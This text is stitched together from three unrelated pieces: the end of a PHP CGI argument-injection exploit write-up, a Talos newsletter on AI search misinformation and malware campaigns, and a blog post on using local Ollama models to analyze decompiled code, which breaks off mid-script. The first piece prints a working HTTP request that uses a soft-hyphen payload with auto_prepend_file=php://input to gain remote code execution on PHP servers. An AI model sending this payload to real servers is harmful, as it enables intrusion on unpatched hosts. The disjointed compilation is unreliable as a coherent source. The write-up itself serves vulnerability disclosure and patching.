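# 0x2d is a real hyphen; 0xad is the soft hyphen that best-fit maps to one.
benign    = b"-d allow_url_include=1"
malicious = b"\xadd allow_url_include=1"

for name, arg in (("benign", benign), ("malicious", malicious)):
    print(f"{name:9} {arg.hex(' ')}")
# benign    starts 2d 64 20 ... while malicious starts ad 64 20 ...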

This is remarkably similar to an older PHP bug (when in CGI mode), CVE-2012-1823, and so we can borrow some exploitation techniques developed for this older bug and adapt them to work with our new bug. A helpful writeup advises that, to translate our injection into RCE, we should aim to inject the following arguments:

-d allow_url_include=1 -d auto_prepend_file=php://input

This will accept input from our HTTP request body, and process it using PHP. Straightforward enough - let’s try a version of this equipped with our 0xAD ‘soft hyphen’ instead of the usual hyphen. Maybe it’s enough to slip through the escaping?

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>
 

Oh joy - we’re rewarded with a phpinfo page, showing us we have indeed achieved RCE.

[Image: the phpinfo page returned by the exploited host]

Conclusions

A nasty bug with a very simple exploit - perfect for a Friday afternoon.

Fortunately, though, patches are available, so we echo Orange Tsai’s advice to upgrade your PHP installation. As always, fantastic work and a salute to Orange Tsai.

Those running in an affected configuration under one of the affected locales - Chinese (simplified or traditional) or Japanese - are urged to do this as fast as humanly possible, as the bug has a high chance of being exploited en masse due to the low exploit complexity. Other users are still strongly encouraged to update:

For Windows running in other locales such as English, Korean, and Western European, due to the wide range of PHP usage scenarios, it is currently not possible to completely enumerate and eliminate all potential exploitation scenarios. Therefore, it is recommended that users conduct a comprehensive asset assessment, verify their usage scenarios, and update PHP to the latest version to ensure security.

We won’t duplicate the advisory here, instead, we advise those individuals seeking remediation advice to refer to the comprehensive advisory.

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

It's our job to understand how emerging threats, vulnerabilities, and TTPs affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.

The sliding doors of misinformation that come with AI-generated search results


As someone who used to think that his entire livelihood would come from writing, I’ve long wondered if any sort of computer or AI could replace my essential functions at work. For now, it seems there are enough holes in AI-generated language that my ability to write down a complete, accurate and cohesive sentence is not in danger. 

But a new wave of AI-generated search results is already turning another crucial part of my job and education on its head: search engine optimization. 

Google’s internal AI tool recently started placing its own answers to common queries in Google’s search engine at the top of results pages, above credible or original news sources. At first, this resulted in some hilarious mix-ups, including telling people they could mix glue into pizza sauce to keep cheese adhered to their crust, or that it’s safe to eat a small number of rocks every day as part of a balanced diet. 

Hilarious as those examples are, I’m worried about the potential implications these features may have for misinformation and fake news on topics that are more important, or easier to believe, than topping your pizza with glue.

There currently doesn’t seem to be a rhyme or reason to when these types of results do or don’t show up. Google recently announced several changes to its AI-generated search results that now aim to prevent misleading or downright false information on search queries that cover more “important” topics.  

“For topics like news and health, we already have strong guardrails in place. For example, we aim to not show AI Overviews for hard news topics, where freshness and factuality are important. In the case of health, we launched additional triggering refinements to enhance our quality protections,” the company said in a blog post.  

When testing this out firsthand, I got mixed results. For “hard” news topics, Google isn’t displaying AI-generated results at all; for example, no AI Overview appeared when I searched for topics like “Who should I vote for in the 2024 presidential election?” and “Does the flu vaccine really work?”

But I did get one of the AI-generated answers when I searched for “When is a fever too high for a toddler?” The displayed answer told me to call a pediatrician if my child is older than three months and has a fever of 102.2 degrees Fahrenheit or higher. Parents’ experience in this realm will differ, but for whatever it’s worth, my daughter’s pediatrician specifically recommended to us not to seek emergency help until a fever has reached 104 degrees or lasts for more than 24 hours even with the use of fever-reducing medicine. 

[Image: the AI-generated answer for the toddler fever query]

Google’s AI also displayed information when I searched for “Talos cryptocurrency scams” to try and find one of our past blog posts. This summary was accurate, though it may have copy-pasted some text directly from press coverage of the Talos research in question — that’s a whole different issue that the journalist in me is concerned about. What was also interesting to me was that, when I entered the same exact search query the next day, the results page didn’t display this AI Overview. 

[Image: the AI Overview shown for the “Talos cryptocurrency scams” query]

Bing, Microsoft’s direct competitor to Google’s search engine, is also using its own form of AI-curated content to answer queries.

My concern here is when or if these types of answers are generated for news topics that are already rife with misinformation — think elections, politics, public health and violent crime. Even a slight slip up from one of these language models, such as getting a certain number incorrect or displaying a link from a known fake news or satire site, could have major consequences for spreading disinformation. 

On last week’s episode of Talos Takes, Martin Lee and I discussed how the most convincing forms of disinformation and fake news are short, punchy headlines or social media posts. The average person is not as media literate as we’d like to think, and seeing a quick and easy summary of a topic after they type an answer into a search engine is likely going to be good enough for most users on the internet. It’s usually going above and beyond just to ask someone to click through to the second page of Google’s search results.  

AI’s integration into search engines could change the way many of us interact with the internet — I’ve used Google’s search engine as my homepage since I was in middle school. At the risk of sounding hyperbolic, I don’t want to assume that this is going to be an issue; perhaps companies will sort all the issues out, or AI Overviews won’t come for more serious news topics than general life questions. But so far, the results shouldn’t inspire much confidence.

The one big thing 

Cisco Talos recently discovered a new threat actor called “LilacSquid” targeting the IT and pharmacy sectors, looking to maintain persistent access on victims’ networks. This campaign leverages vulnerabilities in public-facing application servers and compromised remote desktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as MeshAgent and SSF, alongside customized malware, such as “PurpleInk,” and two malware loaders we are calling “InkBox” and “InkLoader.”

Why do I care? 

LilacSquid’s victimology spans a diverse set of victims: information technology organizations building software for the research and industrial sectors in the United States, organizations in the energy sector in Europe, and the pharmaceutical sector in Asia, indicating that the threat actor (TA) may be agnostic of industry verticals and trying to steal data from a variety of sources. Talos assesses with high confidence that this campaign has been active since at least 2021. Multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear some overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus — these are some of the most active threat actors currently on the threat landscape.

So now what? 

LilacSquid commonly gains access to targeted victims by exploiting vulnerable web applications, so as always, it’s important to patch any time there’s a vulnerability on your network. Talos has also released new Snort rules, ClamAV signatures and other Cisco Security detection content that can detect LilacSquid’s activities and the malware they use.

Top security headlines of the week 

Several hospitals in London are still experiencing service disruptions after a cyber attack targeting a third-party pathology services provider. Some of the most high-profile healthcare facilities in Britain’s capital had to cancel or reschedule appointments or redirect patients to other hospitals. Lab services provider Synnovis confirmed the ransomware attack in a statement on Tuesday and said it was working with the U.K.’s National Health Service to minimize the effects on patients. This latest ransomware attack is illustrative of the larger cybersecurity issues facing the NHS, which manages a massive network of hospitals across the U.K. and has more than 1.7 million employees. In June 2023, the BlackCat ransomware group stole sensitive data from a few NHS hospitals and posted it on a data leak site. And just last month, a different group threatened to leak data from an NHS board overseeing a region of Scotland. The incident also forced other hospitals in the area to expand their capacities and operations to take on more patients, potentially stretching their resources thin. As of Wednesday afternoon, there was no timetable available for the resolution of these issues. (The Record by Recorded Future, Bloomberg)

International law enforcement agencies teamed up for what they are calling one of the largest botnet disruptions ever. U.S. prosecutors announced last week that they dismantled a botnet called “911 S5,” arresting and charging its administrator as part of a global effort. The botnet reportedly infected more than 19 million residential IP addresses, using the compromised devices to mask cybercriminal activity for anyone who paid for access to the botnet. Adversaries had used 911 S5 for a range of malicious activities, including bomb threats, the distribution of child abuse imagery and the creation of fraudulent COVID-19 relief payments totaling more than $6 billion. The administrator, a People’s Republic of China native, is charged with creating and disseminating “malware to compromise and amass a network of millions of residential Windows computers worldwide,” according to a U.S. Department of Justice press release. The botnet was allegedly active between 2014 and July 2022. 911 built its network by offering a phony “free” VPN service to users, allowing them to browse the web while redirecting their IP address and protecting their privacy. However, the VPN service turned the target’s device into a traffic relay for the malicious 911 S5 customers. (U.S. Department of Justice, Krebs on Security)

In a separate law enforcement campaign called “Operation Endgame,” law enforcement agencies from several countries disrupted droppers belonging to several malware families. Targets included IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee and Trickbot. The coordinated effort between multiple European countries and the U.S. FBI led to four arrests of alleged malware operators and the seizure of more than 100 servers and 2,000 attacker-controlled domains. Eight Russian nationals have also been added to the list of Europe’s most wanted fugitives for their alleged roles in developing the botnets behind Smokeloader and TrickBot, two of the most infamous malware families. Law enforcement agencies are also zeroing in on the person they believe to be behind the Emotet botnet, nicknamed “Odd.” “We have been investigating you and your criminal undertakings for a long time and we will not stop here,” Operation Endgame warned in a video to threat actors. The investigation also found that the botnet operators had generated more than 69 million euros by renting out their infrastructure to other threat actors so they could deploy ransomware. (Dark Reading, Europol)

Can’t get enough Talos? 

Upcoming events where you can find Talos 

AREA41 (June 6 – 7) 

Zurich, Switzerland 

Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the paramount importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches.

Cisco Connect U.K. (June 25)

London, England

In a fireside chat, Cisco Talos experts Martin Lee and Hazel Burton discuss the most prominent cybersecurity threat trends of the near future, how these are likely to impact UK organizations in the coming years, and what steps we need to take to keep safe.

BlackHat USA (Aug. 3 – 8) 

Las Vegas, Nevada 

Defcon (Aug. 8 – 11) 

Las Vegas, Nevada 

BSides Krakow (Sept. 14)  

Krakow, Poland 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202 
MD5: e4acf0e303e9f1371f029e013f902262 
Typical Filename: FileZilla_3.67.0_win64_sponsored2-setup.exe 
Claimed Product: FileZilla 
Detection Name: W32.Application.27hg.1201 

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::1201 

SHA 256: 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1
MD5: 3e10a74a7613d1cae4b9749d7ec93515
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::1201

SHA 256: a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0 
MD5: b4440eea7367c3fb04a89225df4022a6 
Typical Filename: Pdfixers.exe 
Claimed Product: Pdfixers 
Detection Name: W32.Superfluss:PUPgenPUP.27gq.1201 

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
MD5: 8c69830a50fb85d8a794fa46643493b2  
Typical Filename: AAct.exe  
Claimed Product: N/A   
Detection Name: PUA.Win.Dropper.Generic::1201 

How to Train Your Large Language Model

Large Language Models (LLMs) such as those provided by OpenAI (GPT-3/4), Google (Gemini), and Anthropic (Claude) can be useful tools to include when conducting security audits or reverse engineering; however, one of the main downsides of using these tools is that the data you are reviewing is processed server-side, meaning any data analyzed by the tool must be uploaded/sent to the server.

While these services provide privacy policies that may double-pinky-swear your data is safe and that they will not use it for training if you opt out, as consultants we are often working with client data that is under NDA, preventing the use of these services. Outside of cases where an NDA is in place, a policy won't protect you from platform bugs or provider monitoring that may leak your data or research. We have already seen an example of this, with OpenAI publicly confirming that it monitors usage of its service to identify potentially 'evil' usage by bad actors - https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/

Besides privacy concerns, a few other disadvantages of using a hosted service are:

  • the service may go away (outage/sale)
  • it may be modified to prevent malicious use (RE/exploitation work is often flagged)
    • potentially resulting in monitoring or an account ban
  • costs (usually per-token)

Given these hurdles, smaller models that run locally on your own hardware are a promising path to leveraging an LLM without compromising your privacy or an NDA.

Comparisons

To be fair, it is worth pointing out the differences between the hosted LLM offerings and the local versions. The big difference is going to be the size of the training dataset and the model parameter size - this can be thought of as the amount of 'knowledge' or data stored within the model; more parameters indicates more 'knowledge' it can reference based on your input. OpenAI does not provide the details of GPT-4; GPT-3 was 100+ billion parameters, while GPT-3.5's size has not been disclosed - speculation/research/guessing indicates it is much smaller (~22b parameters), due to fine-tuning and/or other 'secret sauce'. It is speculated that the original GPT-4 is in the trillion-parameter range. On the other hand, a local model that will run on consumer hardware is going to be in the 2b-70b range; this is obviously a clear disadvantage and is going to result in lower quality responses when compared to a hosted service.

Run Whatcha Brung

The actual size of the model you can run is going to be dependent on how much memory you have available - a decent rule is that the model will occupy twice the memory of its parameter count: 2b/4GB, 7b/14GB, etc. The main exception to this rule is models that have been modified to use smaller values for stored parameters (quantization). Normally a model will use 16-bit floating-point values for parameters; however, by clipping these values to smaller units (8/4-bit), the size can be reduced with minimal to no quality drop, resulting in lower memory usage and faster results.
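The arithmetic behind that rule of thumb is straightforward; a quick back-of-the-envelope check (weights only, ignoring activation and context overhead):

# Rough memory footprint: parameters x bits-per-parameter / 8 = bytes of weights.
def model_size_gb(params_billions, bits_per_param):
    return params_billions * 1e9 * bits_per_param / 8 / 1e9

for bits in (16, 8, 4):
    print(f"7b model @ {bits:2}-bit: {model_size_gb(7, bits):4.1f} GB")
# 16-bit: 14.0 GB, 8-bit: 7.0 GB, 4-bit: 3.5 GB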

When it comes to the actual speed of results, it comes down to where you are running your inference. The best results will come from a recent GPU, ideally with 24GB of VRAM - meaning an NVIDIA 3090 or 4090; a used 3090 is the best value for a turnkey solution. The next best setup is an Apple Silicon (ARM) MacBook/Studio/etc. - while this may be contentious, it is difficult to match the performance due to the shared memory architecture, as you are able to use system RAM for compute without a performance hit. While it is possible to run these models from system RAM using the CPU on x86/64 machines, there is a performance hit compared to the previous options and results will most likely be slow - of course there are caveats here; as with anything, you will find cases where highly tuned setups perform well, but here we are just considering ease of use and time to get started.

Execution

There are quite a few ways to run models locally; in this case I am using Ollama, as it just works and is fairly batteries-included for most use cases. Ollama provides installers for OSX, Linux, and Windows. Downloading and running a local model is as easy as executing the command ollama run with a model from the registry; the required files will automatically download and an interactive 'chat' shell will start:

% ollama run phi3
pulling manifest
pulling b26e6713dc74... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏ 2.4 GB
pulling fa8235e5b48f... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏ 1.1 KB
pulling 542b217f179c... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏  148 B
pulling 8dde1baf1db0... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏   78 B
pulling f91db7a2deb9... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏  485 B
verifying sha256 digest
writing manifest
removing any unused layers
success
>>> write me a sentence for my blog post about using a local running LLM to assist reversing binary applications.
 "Utilizing a local language model (LLM) tailored for our environment empowers developers to efficiently reverse binary applications, enhancing the debugging and
understanding of complex software systems."

>>> /bye
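Beyond the interactive shell, Ollama also serves a local HTTP API (on port 11434 by default), which is what you would use to drive a model from scripts. A minimal sketch against the generate endpoint, assuming the phi3 model pulled above:

# Minimal sketch: one-shot completion via Ollama's local REST API.
import requests

resp = requests.post(
    "http://localhost:11434/api/generate",
    json={
        "model": "phi3",
        "prompt": "In one sentence, what is a use-after-free bug?",
        "stream": False,  # return a single JSON object rather than a stream
    },
    timeout=120,
)
print(resp.json()["response"])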

With the boring up-front details out of the way, we can try and do something useful.

Hammer Looking for Nails

As with any tool, it works best if you have a specific use case to apply it to; in this case, we will look at using a model to help analyze Hex-Rays pseudocode. As pseudocode is close to C, most models trained on code should be able to aid with this task; I have chosen to work with Mistral's 7b model. While there are larger models available that I could run on my hardware, this model has been found to perform quite well for its size, and I really wanted to target something that would be relatively performant on lower-end hardware.

Prompting Your Way Out

The first step in this process is to understand how well the model will execute a given task and identify the instructions needed to get a useful response. The following prompt was executed:

Analyze the following code and provide a description of what it does. Based on analysis provide updated variable names to replace the current ones.
unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The prompt produced the following output:

The given code defines a function named `sub_C385C` that takes an integer argument `a1`. Inside the function, an integer variable `v1` is declared and initialized with the value of the memory location pointed to by `byte_11A2DC` with index `a1`.

Next, a check is made whether the result of calling `sub_CE2BC(0)` is true. If it is, then the value of `v1` is OR-ed with the binary number 4. The resulting value is assigned to a new variable `v2`, which remains undeclared in the given code snippet.

Finally, the original variable `v1` has its bits andered using the bitwise AND operator with the binary number -5 (0xFFFFFFFD) and this result is returned from the function.

To improve the readability of the code, you could consider renaming variables as follows:

```c
unsigned int __fastcall get_value_from_array(int arrayIndex)
{
  unsigned int value;

  value = memoryLocation[arrayIndex]; // Assuming memoryLocation is a properly defined pointer to the memory location pointed to by byte_11A2DC

  if ( checkCondition() )
    value |= 4; // OR with constant 4

  return value & 0xFFFFFFFD; // AND with binary number -5
}

Note: Replace `memoryLocation` and `checkCondition` with actual variable names.

This response looks promising, but trying to use it programmatically would be difficult. We can do better by adjusting our prompt to instruct the model to return the values as JSON:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters.

unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The following output was generated:

{
  "function_name": "process_byte_value",
  "comment": "This function takes an integer input, retrieves the corresponding byte value from a global array, performs a condition check and returns the processed byte value.",
  "variables": [
    {
      "name": "input",
      "type": "int"
    },
    {
      "name": "byte_value",
      "type": "int"
    },
    {
      "name": "additional_flag",
      "type": "unsigned int"
    },
    {
      "name": "global_array",
      "type": "unsigned int[]",
      "description": "Global array of byte values."
    }
  ]
}

// The function named 'process_byte_value' takes an input integer, retrieves the corresponding byte value from a global array, performs a condition check and returns the processed byte value.

unsigned int process_byte_value(int input) {
  int byte_value;
  unsigned int additional_flag = 0;

  if (sub_CE2BC() == true) { // Perform some global flag check here
    additional_flag = 4;
  }

  byte_value = global_array[input]; // Retrieve the corresponding byte value from the global array.

  return (byte_value & 0xFFFFFFF8) | additional_flag; // Perform bitwise operations on the byte_value and additional_flag before returning

Running the same input another time, we get a slight variation on the output:

{
  "function_name": "processInputByte",
  "comment": "This function processes an input byte by checking a specific condition and modifying the byte accordingly.",
  "variables": [
    {"name": "inputByte", "type": "int"},
    {"name": "byteMask", "type": "unsigned int"},
    {"name": "conditionMet", "type": "bool"},
    {"name": "processedByte", "type": "unsigned int"}
  ]
}

// This function processes an input byte by checking a specific condition and modifying the byte accordingly.
unsigned int processInputByte(int inputByte) {
  unsigned int processedByte = BYTE_11A2DC[inputByte]; // Load byte from memory location
  bool conditionMet = sub_CE2BC(0); // Check specific condition

  if (conditionMet) {
    processedByte |= 4; // Set specific bit in the byte if condition is met
  }

  return processedByte & 0xFFFFFFFD; // Return the processed byte with certain bits cleared.

Neither of these is ideal, as we only want the JSON structure so we can parse it programmatically. By adjusting the prompt, we can try to guide the output toward what we are expecting:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does. Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.

unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The resulting output of this prompt:

{
  "function_name": "processInputByte",
  "comment": "This function takes an input integer and processes a byte from a lookup table based on the input. If a certain condition is met, a bit is set in the output.",
  "variables": [
    {
      "name": "input",
      "description": "The input integer"
    },
    {
      "name": "byteValue",
      "description": "The value of the byte from the lookup table corresponding to the input"
    },
    {
      "name": "outputBitSet",
      "description": "An output variable that has a bit set if the condition is met"
    },
    {
      "name": "lookupTable",
      "description": "A global lookup table used to retrieve the byte value based on the input"
    }
  ]
}

This output is much better: it follows our instructions and produced only a valid JSON structure. However, if we run the same input again, the output varies, returning a slightly different structure along with details outside the JSON:

{
  "function_name": "process_byte_value",
  "comment": "Processes a byte value from the memory location specified by the input parameter and returns the result.",
  "variables": [
    {
      "name": "input_index",
      "type": "int",
      "description": "The index of the byte value to be processed."
    },
    {
      "name": "processed_value",
      "type": "unsigned int",
      "description": "The processed value of the input byte."
    },
    {
      "name": "is_special_condition_met",
      "type": "int",
      "description": "Flag indicating whether a special condition is met or not."
    }
  ]
}

unsigned int process_byte_value(int input_index)
{
  unsigned int processed_value;
  int is_special_condition_met = sub_CE2BC(0);

  processed_value = byte_11A2DC[input_index];

  if (is_special_condition_met)
    processed_value |= 4;

  return processed_value & 0xFFFFFFFD;
}

We could continue down this path, adjusting the instructions to describe what the expected output should be for a given input, but eventually the response will deviate in some way, breaking our ability to programmatically interface with it. Instead of trying to describe what we want, we can provide an example of what we want the model to generate (single/multi-shot prompting). An important thing to remember when dealing with an LLM is that it is predicting the next token/word to output based on the current input; by providing an example exchange, you create a pattern for it to follow. The following revised prompt shows the original prompt modified to provide a single-shot example:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.
Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.
For example, the user will submit code for analysis:

unsigned int __fastcall sub_C1337(int a1,int a2)
{
  int v1;
  unsigned int v2;

  v1 = byte_fff[a1 + a2];
  if ( v1 )
    v2 = v1 + 0xFF
  return v1 & 0xFFFFFFFD * v2;
}

Your response would be:
{
"function_name": "new_function_name",
"comment": "This function uses the arguments a1 and a2 as index into byte_fff, returning a bitwise value based on the result of the called function subCE2BC.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName"},"original_name":"v2","new_name":"AnalyzedVarName"}]
}

Analyze the following code:
unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

In this prompt, we have provided the same instructions as before, plus an example showing what a user would submit and the expected response, followed by the actual code we want analyzed. In this case, the responses match our desired output and are consistent across multiple executions.

Initial generated response:

{
  "function_name": "checkAndModifyByteValue",
  "comment": "This function uses the argument a1 as an index into byte_11A2DC. If the sub_CE2BC function returns true, the value at that index is modified by setting the 4th bit to 1. The function then returns the original value with the 3 highest bits cleared.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ModifiedByteValue"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedByteWithBitSet"
    }
  ]
}

Followup executions:

{
  "function_name": "analyze_byte_from_array_and_apply_condition",
  "comment": "This function uses the argument a1 as index into byte_11A2DC, applies a condition using external function sub_CE2BC, and returns a bitwise value based on the result.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "AnalyzedByte"
    },
    {
      "original_name": "v2",
      "new_name": "ConditionalValue"
    }
  ]
}

{
  "function_name": "newFunctionName",
  "comment": "This function takes an integer argument a1, retrieves a value from the memory location byte\\_11A2DC with the index a1, and if the sub\\_CE2BC function returns true, sets a new variable value to the original value orpped with 4. The final return is a bitwise AND of the original value with 0xFFFFFFFD.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ResultVar"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedVar"
    }
  ]
}

{
  "function_name": "checkBitAndModifyByte",
  "comment": "This function uses the argument a1 as an index into byte_11A2DC, checks if sub_CE2BC returns true and modifies the value if it does by setting the 4th bit. It then returns the original value with some bits cleared.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ByteValue"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedByte"
    }
  ]
}

The results are decent and do not stray from the format/content we provided in our prompt; we can even include more examples with varying content (multi-shot) if we wanted to. At this point, we have a basic prompt that performs the specific task we want relatively well, and the response is parsable JSON for automated use.
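Since we will be consuming these responses from code, it is worth being defensive about parsing. The following is a minimal sketch of a validation helper (the function name and required-key check are my own, not part of the original tooling) that pulls the first JSON object out of a response and confirms it has the structure our prompt asked for:

```python
import json

def extract_json(response: str):
    # best-effort: locate the outermost braces, since models occasionally
    # wrap the JSON in extra prose despite our instructions
    start, end = response.find("{"), response.rfind("}")
    if start == -1 or end <= start:
        return None
    try:
        obj = json.loads(response[start:end + 1])
    except json.JSONDecodeError:
        return None
    # only accept responses matching the structure the prompt requested
    if all(k in obj for k in ("function_name", "comment", "variables")):
        return obj
    return None
```

Anything that fails this check can simply be re-queried, which is usually cheaper than trying to repair a malformed response.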

Light Customization

If you have a specific use case (agent/assistant/task), you can configure a version of the underlying pre-trained weights through Ollama's Modelfile interface. The Modelfile provides a lightweight layer to control/configure precomputed weights that can be easily edited and shared with other users. The following shows an example Modelfile configured for our potential Hex-Rays assistant using the prompt we created:

# defines the base pre-computed weights we want to use
FROM mistral:7b-instruct

# template is the format of the interactions with the model
# this is using templating provided by ollama where .System
# and .Prompt  are replaced with the defined variables 
TEMPLATE "{{ .System }}
[INST]
{{ .Prompt }}
[/INST]
"

# SYSTEM is the prompt/text that the model is started with, there are some special values included within this prompt
# that are described below, for now this is where the prompt we developed earlier goes
SYSTEM """<s>[INST]Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.
Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.
For example, the user will submit code for analysis:

unsigned int __fastcall sub_C1337(int a1,int a2)
{
  int v1;
  unsigned int v2;

  v1 = byte_fff[a1 + a2];
  if ( v1 )
    v2 = v1 + 0xFF
  return v1 & 0xFFFFFFFD * v2;
}

Your response would be:
{
"function_name": "new_function_name",
"comment": "This function uses the arguments a1 and a2 as index into byte_fff, returning a bitwise value based on the result of the called function subCE2BC.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName"},"original_name":"v2","new_name":"AnalyzedVarName"}]
}

Analyze the following code:[/INST]
</s>
"""
PARAMETER stop [INST]
PARAMETER stop [/INST]
# these control internal settings within the model to adjust how it behaves
PARAMETER temperature 1.2
PARAMETER top_k 100
PARAMETER top_p 0.09
PARAMETER num_ctx 4096
PARAMETER repeat_last_n 512
PARAMETER repeat_penalty 1.1

To sidetrack for a second: each model has its own prompt format that is required to be used, as well as specific tokens to mark instructions and the start/stop of input - these values can be found within the tokenizer configuration file (tokenizer_config.json). For instance, Mistral 7b-Instruct (https://huggingface.co/mistralai/Mistral-7B-Instruct-v0.1/blob/main/tokenizer_config.json) defines the special values and format we used in our Modelfile:

{
  ...
  ...
  "bos_token": "<s>",
  "chat_template": "{{ bos_token }}{% for message in messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == 0) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{% if message['role'] == 'user' %}{{ '[INST] ' + message['content'] + ' [/INST]' }}{% elif message['role'] == 'assistant' %}{{ message['content'] + eos_token + ' ' }}{% else %}{{ raise_exception('Only user and assistant roles are supported!') }}{% endif %}{% endfor %}",
  "clean_up_tokenization_spaces": false,
  "eos_token": "</s>",
  ...
  ...
}

Not all models use the same chat_template structure or beginning-of-string (bos_token) or end-of-string (eos_token) values, so it is worth understanding where those formats and tokens come from.
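If you have the Hugging Face transformers library installed, a quick way to confirm these values (a sketch, assuming you can pull the tokenizer locally) is to render a message through the model's chat template:

```python
from transformers import AutoTokenizer

tok = AutoTokenizer.from_pretrained("mistralai/Mistral-7B-Instruct-v0.1")
print(tok.bos_token, tok.eos_token)  # <s> </s>

# render a one-turn conversation through the model's chat_template
messages = [{"role": "user", "content": "Analyze the following code: ..."}]
print(tok.apply_chat_template(messages, tokenize=False))
# <s>[INST] Analyze the following code: ... [/INST]
```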

After saving this file to disk (idapal_simple.modelfile), it can be loaded using Ollama:

% ollama create iDAPalSimple -f idapal_simple.modelfile
transferring model data
using existing layer sha256:e8a35b5937a5e6d5c35d1f2a15f161e07eefe5e5bb0a3cdd42998ee79b057730
using existing layer sha256:43070e2d4e532684de521b885f385d0841030efa2b1a20bafb76133a5e1379c1
using existing layer sha256:2af02daf0820d322d7e928bec1d7398090f4679c49c24c67575b5cffa7f08668
creating new layer sha256:cd2ecea3b680dc83a3d3981ec5efcca96c74f7b5794e7008d8f94522bf024f0d
using existing layer sha256:b4f4d07d73c548c4cd652806db6d567ceff891910db2bf5d5410dcc7e76eeb5a
creating new layer sha256:96a6cc4cffa5e48e458c33efa5301f519279a08eb51ae4a9b33e9ac7abce76d9
writing manifest
success

After creation, the new configuration can be tested by entering the interactive mode via the run command and pasting in the previous code:

% ollama run iDAPalSimple
>>> unsigned int __fastcall sub_C385C(int a1)
... {
...   int v1;
...   unsigned int v2;
...
...   v1 = byte_11A2DC[a1];
...   if ( sub_CE2BC(0) )
...     v2 = v1 | 4;
...   return v1 & 0xFFFFFFFD;
... }
{
"function_name": "new_function_name_C385C",
"comment": "This function uses the argument a1 as an index into byte\_11A2DC. It calls sub\_CE2BC with an argument of 0 and sets v2 to the result of
bitwise OR operation between v1 and 4 if sub\_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between
v1 and 0xFFFFFFFD.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName_C385C"},{"original_name":"v2","new_name":"AnalyzedVarName_C385C_v2"}]
}

The observed response shows that the model works and is using the configured system prompt, returning the expected result after being provided only a code block as input. Ollama also provides an API that can be accessed locally (https://github.com/ollama/ollama/blob/main/docs/api.md); this can be used as seen in the following simple Python client:

import requests, json

def do_analysis(code):
    url = "http://localhost:11434/api/generate"
    headers = {"Content-Type": "application/json"}
    # inform the API we are using our configured model and want a single,
    # non-streamed JSON response
